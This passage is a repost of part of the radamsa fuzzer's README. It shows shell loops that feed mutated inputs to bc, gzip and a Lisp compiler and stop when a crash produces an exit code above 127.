1 + (2 + (3 + 170141183460469231731687303715884105727))

There is no guarantee that all of the outputs will be unique. However, when using nontrivial samples, equal outputs tend to be extremely rare.

What we have so far can be used, for example, to test programs that read input from standard input, as in:

$ echo "100 * (1 + (2 / 3))" | radamsa -n 10000 | bc
[...]
(standard_in) 1418: illegal character: ^_
(standard_in) 1422: syntax error
(standard_in) 1424: syntax error
(standard_in) 1424: memory exhausted
[hang]

Or the compiler used to compile Radamsa:

$ echo '((lambda (x) (+ x 1)) #x124214214)' | radamsa -n 10000 | ol
[...]
> What is 'ó µ'?
4901126677
> $

Or to test decompression:

$ gzip -c /bin/bash | radamsa -n 1000 | gzip -d > /dev/null

Typically however one might want a separate run of the program for each output. Basic shell scripting makes this easy. Usually we want a test script to run continuously, so we'll use an infinite loop here:

$ gzip -c /bin/bash > sample.gz
$ while true; do radamsa sample.gz | gzip -d > /dev/null; done

Notice that we are here giving the sample as a file instead of running Radamsa in a pipe. Like cat, Radamsa will by default write the output to stdout, but unlike cat, when given more than one file it will usually use only one or a few of them to create one output.

This test will go about throwing fuzzed data against gzip, but doesn't care what happens then. One simple way to find out if something bad happened to a (simple, single-threaded) program is to check whether the exit value is greater than 127, which would indicate a fatal program termination. This can be done for example as follows:

$ gzip -c /bin/bash > sample.gz
$ while true
  do
    radamsa sample.gz > fuzzed.gz
    gzip -dc fuzzed.gz > /dev/null
    test $? -gt 127 && break
  done

This will run for as long as it takes to crash gzip, which hopefully is no longer even possible, and fuzzed.gz can be used to check the issue if the script has stopped. We have found a few such cases, the last of which took about 3 months to find, but all of them have as usual been filed as bugs and promptly fixed by upstream.

One thing to note is that since most of the outputs are based on data in the given samples (standard input or files given on the command line), it is usually a good idea to try to find good samples, and preferably more than one of them. In a more real-world test script radamsa will usually be used to generate more than one output at a time based on tens or thousands of samples, and the consequences of the outputs are tested mostly in parallel, often by giving each of the outputs on the command line to the target program. We'll make a simple such script for bc, which accepts files from the command line.

The -o flag can be used to give a file name to which radamsa should write the output instead of standard output. If more than one output is generated, the path should have a %n in it, which will be expanded to the number of the output.

$ echo "1 + 2" > sample-1
$ echo "(124 % 7) ^ 1*2" > sample-2
$ echo "sqrt((1 + length(10^4)) * 5)" > sample-3
$ bc sample-* < /dev/null
3
10
5
$ while true
  do
    radamsa -o fuzz-%n -n 100 sample-*
    bc fuzz-* < /dev/null
    test $? -gt 127 && break
  done

This will again run up to obviously interesting times indicated by the large exit value, or up to the target program getting stuck.

In practice many programs fail in unique ways. Some common ways to catch obvious errors are to check the exit value, enable fatal signal printing in the kernel and check if something new turns up in dmesg, run the program under strace, gdb or valgrind and see if something interesting is caught, check if an error reporter process has been started after starting the program, etc.

Sursa: https://github.com/aoh/radamsa
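As a small aside on the exit-value check used in the loops above (a sketch, not part of radamsa): POSIX shells report 128 + signal number as the exit status of a process killed by a fatal signal, which is why "greater than 127" identifies crashes. This can be observed without any fuzzer at all:

```shell
#!/bin/sh
# Demonstrate the >127 convention: a process killed by SIGSEGV
# (signal 11 on Linux) exits with status 128 + 11 = 139.
sh -c 'kill -SEGV $$'   # simulate a target crashing with a segfault
status=$?
if test "$status" -gt 127
then
    echo "fatal signal: $((status - 128))"
fi
```

A test harness can use the same check to distinguish ordinary parse errors (small exit codes) from genuine crashes worth triaging.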